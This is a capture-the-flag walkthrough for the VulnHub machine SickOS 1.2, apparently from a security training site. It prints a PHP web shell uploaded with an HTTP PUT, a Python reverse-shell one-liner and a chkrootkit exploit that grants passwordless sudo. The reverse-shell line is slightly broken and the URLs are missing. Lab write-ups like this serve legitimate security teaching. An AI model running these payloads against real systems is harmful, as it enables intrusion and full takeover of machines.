SickOS 1.2 surfaced on VulnHub on April 21st, 2016. Created by D4rk, it can be found at,144/. It is the second machine in the SickOS series. Running Ubuntu Operating System, the objective is to get contents of /root/7d03aaa2bf93d80040f3f22ec6ad9d5a.txt.

For the attacking machine, I will be using Kali 2017.1.

Once booted, this is what the machine looks like:

We start the attack by finding the IP of the victim machine by using the netdiscover command:

$ netdiscover

Now that we know our target IP, let us start by scanning the ports and try to get more information about it:

The scan shows us that the following ports are open:

  • Port 22 – Running OpenSSH
  • Port 80 – Running lighttpd

Let us head over to the browser to see if we find something useful:

After going through the source code of the page, I do not find anything useful. Let us fire up dirbuster to see if the server is hiding anything from us:

A quick result shows us a directory /test/ that is present:

Heading over to the directory, it is a blank directory listing.

Since dirbuster too has not come up with anything else so far, why not see what all we can do with this link? Hitting a simple cURL request to this link would be able to tell us a lot more than we know:

$ curl -v -X OPTIONS

Well, that interesting! As we can see, the method PUT is allowed on the URL meaning we can create a new resource:

$ curl -v -X PUT -d ‘<?php system ($_GET[“cmd”]); ?>’

The above query will create a file shell.php in /test/ directory along with the PHP code we added to get us a command line:

In addition, we have partially exploited the vulnerability! Now let us try to get a reverse shell:

I will be using the following Python reverse shell (more can be found at ):

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);[“/bin/sh”,”-i”]);’

Now let us start a listener on port 443 and send the above shell in the previous link we exploited:

$ curl “”

Ethical Hacking Training – Resources (InfoSec)

Note: I tried to use port 444 and 4444, but it did not work as they are blocked.

Voila, we have a low privilege shell:

Now let’s explore the system and see what else is there we can exploit to become root. After some time, I stumbled upon something really interesting in /, etc./cron.daily:

cron.daily is where all the cron (automatic) jobs that need to be performed by the server on a daily basis are present, and here I can see a chkrootkit. On further examination, I see that the version of chkrootkit in question is 0.49!

After some research, it has a known vulnerability and can be exploited. I used the following exploit:

$ echo ‘chmod 777 /etc/sudoers && echo “www-data ALL=NOPASSWD: ALL” >> /etc/sudoers && chmod 440 /etc/sudoers’ > /tmp/update

A file update would be created in /tmp/. Give that file the following permissions:

$ chmod 777 /tmp/update

Once done, wait for a couple of minutes and then type:

$ sudo su

Now we have root! Let us head over and read the flag.